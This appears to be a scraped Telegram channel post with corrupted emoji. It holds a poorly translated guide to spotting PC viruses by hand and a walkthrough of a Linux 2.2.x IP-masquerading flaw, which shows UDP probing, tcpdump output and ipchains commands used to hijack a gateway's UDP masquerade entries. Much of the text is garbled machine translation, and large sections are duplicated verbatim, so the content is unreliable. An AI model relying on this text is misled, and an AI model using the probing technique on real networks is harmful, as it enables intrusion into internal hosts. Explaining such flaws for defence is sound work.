β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FIX YOUR PC INFECTED
1. Scanning method of anti-virus software
This is probably the first choice for most of our friends, and I am afraid that it is the only choice. Nowadays, there are more and more types of viruses, and the methods of concealment are becoming more and more clever. Virus software developers pose challenges.
2. Observation method
This method can only be accurately observed when you understand the symptoms of some virus outbreaks and where you usually live. When the hard disk is booting, it often crashes, the system boot time is long, the running speed is very slow, the hard disk cannot be accessed, and special sounds or prompts appear. When the above failures occur in the first point, we must first consider that It βs strange, but you ca nβt go all the way through. I did nβt talk about software and hardware failures, and those symptoms may also appear! We can observe from the following aspects for those caused by viruses:
a, memory observation
This method is generally used for viruses found under DOS. We can use the "mem / c / p" command under DOS to check the memory usage of each program, and find the memory occupied by viruses (generally not occupied separately, but attached Among other programs), the memory occupied by some viruses is also relatively hidden. You cannot find it with "mem / c / p", but you can see that there is less than 1k or a few K in the total basic memory of 640K.
b. Registry observation method
This kind of method is generally applicable to the so-called hacker programs that have recently appeared, such as Trojan horse programs. These viruses are generally modified or activated in the registry to achieve automatic startup or loading. Generally, they are implemented in the following places:
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion
Wait, for details, please refer to my other article-"Troubleshooting Trojans", where there will be a more detailed analysis of the possible registration areas.
c. System configuration file observation method
This type of method is also generally suitable for hacker programs. Such viruses are generally hidden in system.ini, wini.ini (Win9x / WinME) and the startup group. There is a "shell =" item in the system.ini file In the wini.ini file, there are "load =" and "run =" items. These viruses generally load their own programs in these items. Note that sometimes some original programs are modified. We can run the msconfig.exe program in Win9x / WinME to check one by one. For details, please refer to my article "Troubleshooting Trojan Horses".
d. Character string observation method
This method is mainly aimed at some special viruses. When these viruses invade, they will write corresponding feature codes. For example, CIH virus will write a string like "CIH" in the invaded file. Of course, we cannot easily find , We can use the hexadecimal code editor to edit the main system files (such as Explorer.exe). Of course, it is better to back up before editing, after all, it is the main system file.
e. Hard disk space observation method
Some viruses will not damage your system files, but only generate a hidden file. This file generally has little content, but it takes up a lot of hard disk space. Sometimes it is too large to allow your hard disk to run general programs, but you I ca nβt see it. At this time, we have to open the resource manager, and then set the properties of the content we view to a file that can view all the properties ...
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦FIX YOUR PC INFECTED
1. Scanning method of anti-virus software
This is probably the first choice for most of our friends, and I am afraid that it is the only choice. Nowadays, there are more and more types of viruses, and the methods of concealment are becoming more and more clever. Virus software developers pose challenges.
2. Observation method
This method can only be accurately observed when you understand the symptoms of some virus outbreaks and where you usually live. When the hard disk is booting, it often crashes, the system boot time is long, the running speed is very slow, the hard disk cannot be accessed, and special sounds or prompts appear. When the above failures occur in the first point, we must first consider that It βs strange, but you ca nβt go all the way through. I did nβt talk about software and hardware failures, and those symptoms may also appear! We can observe from the following aspects for those caused by viruses:
a, memory observation
This method is generally used for viruses found under DOS. We can use the "mem / c / p" command under DOS to check the memory usage of each program, and find the memory occupied by viruses (generally not occupied separately, but attached Among other programs), the memory occupied by some viruses is also relatively hidden. You cannot find it with "mem / c / p", but you can see that there is less than 1k or a few K in the total basic memory of 640K.
b. Registry observation method
This kind of method is generally applicable to the so-called hacker programs that have recently appeared, such as Trojan horse programs. These viruses are generally modified or activated in the registry to achieve automatic startup or loading. Generally, they are implemented in the following places:
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion
Wait, for details, please refer to my other article-"Troubleshooting Trojans", where there will be a more detailed analysis of the possible registration areas.
c. System configuration file observation method
This type of method is also generally suitable for hacker programs. Such viruses are generally hidden in system.ini, wini.ini (Win9x / WinME) and the startup group. There is a "shell =" item in the system.ini file In the wini.ini file, there are "load =" and "run =" items. These viruses generally load their own programs in these items. Note that sometimes some original programs are modified. We can run the msconfig.exe program in Win9x / WinME to check one by one. For details, please refer to my article "Troubleshooting Trojan Horses".
d. Character string observation method
This method is mainly aimed at some special viruses. When these viruses invade, they will write corresponding feature codes. For example, CIH virus will write a string like "CIH" in the invaded file. Of course, we cannot easily find , We can use the hexadecimal code editor to edit the main system files (such as Explorer.exe). Of course, it is better to back up before editing, after all, it is the main system file.
e. Hard disk space observation method
Some viruses will not damage your system files, but only generate a hidden file. This file generally has little content, but it takes up a lot of hard disk space. Sometimes it is too large to allow your hard disk to run general programs, but you I ca nβt see it. At this time, we have to open the resource manager, and then set the properties of the content we view to a file that can view all the properties ...
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Security kernel IP camouflage has security holes :
t.me/UndercodeTesting
1) There are serious security vulnerabilities in the IP camouflage implementation of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.
>Host A: 1035-> GW B: 63767-> Host C: 53
π¦Security kernel IP camouflage has security holes :
t.me/UndercodeTesting
1) There are serious security vulnerabilities in the IP camouflage implementation of Linux system 2.2.x kernel. There is a lack of serious inspection of the connection in the relevant core code. The attacker can rewrite the UDP disguise entry in the core so that the attacker's UDP packet can be routed into the internal machine.
2) When an internal IP wants to access the DNS server of the external network, when the sent UDP packet passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from port 1035 of internal host A to port 53 of external host C. The kernel replaces the source address of this packet with the IP of the disguised gateway (B). Port, the default is from 61000 port to 65096 port, so in theory, the core can handle 4096 TCP / UDP camouflage connections at the same time.
>Host A: 1035-> GW B: 63767-> Host C: 53
π¦ HOW IT WORKS ?
When an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve the masquerade connection is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish the connection. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packet. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
When an external network sends a UDP packet to a disguised gateway, Linux IP disguise only decides whether this UDP packet should be forwarded to the internal network based on the target port. If the target port has a corresponding entry in the established camouflage connection table, it will update the source ip and source port in this packet to the remote host ip and port of the corresponding entry. As long as the attacker judges the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The port range used by the masquerade gateway to serve the masquerade connection is usually from 61000 to 65096, so it is easy for external attackers to determine which ports have been used to establish the connection. An attacker can send UDP detection packets to these ports disguised as a gateway, and then check the IP ID of the port's ICMP response packet. Each host sends a packet, the IP ID in its TCP / IP stack will increase by one. Therefore, the ICMP response sent to the port used for IP masquerading will have the IP ID of the internal host.
π¦EXPLOITING .. This ID will usually be much different from the current IP ID of the gateway host, usually above 1000. The following example shows the process of exploiting weaknesses:
Host A is an internal host (192.168.1.100)
Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25).
Host X is an external attacker's IP (10.10.187.13)
. Before the detection, execute the command on the masquerade gateway: ipchains -L -M -n to display the current masquerade connection table Situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767
[from the attacker βs The result of tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all detection packets to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
Host A is an internal host (192.168.1.100)
Host B is a disguised gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25).
Host X is an external attacker's IP (10.10.187.13)
. Before the detection, execute the command on the masquerade gateway: ipchains -L -M -n to display the current masquerade connection table Situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, the masquerading port is 63767
[from the attacker βs The result of tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all detection packets to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
π¦ The ID of the above package is 17205, and the difference between it and 13139 has exceeded 4000, which means that we have found a pretended connection. !!!
10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id
13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[our detected end of port 65096, we have omitted some results]
now Let's check the situation of the masquerading connection table of the masquerading gateway:
ipchains -L -M -n
> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345
You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.
Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.
-------------------------------------------------- ------------------------------
π¦Suggestion:
For the problem of accessing external DNS, a possible solution is to set it on the disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
10.10.187.13.12345> 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345> 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345> 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1> 10.10.187.13 : icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id
13142 ) 10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345> 10.0.0.1.63771: udp 0 (DF) [tos 0x18] ( ttl 254, id 23092)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[our detected end of port 65096, we have omitted some results]
now Let's check the situation of the masquerading connection table of the masquerading gateway:
ipchains -L -M -n
> UDP 04: 35.12 192.168.1.100 10.10.187.13 1035 (63767)-> 12345
You can see that the remote host has been replaced by an attack The ip of the attacker is 10.10.187.13, and the target port is also replaced by the source port used for attacker detection: 12345.
Now the attacker can send UDP data from the source port 12345 to port 1035 of the internal host.
-------------------------------------------------- ------------------------------
π¦Suggestion:
For the problem of accessing external DNS, a possible solution is to set it on the disguised gateway A cached domain name server, and then prohibit the disguise of UDP packets.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β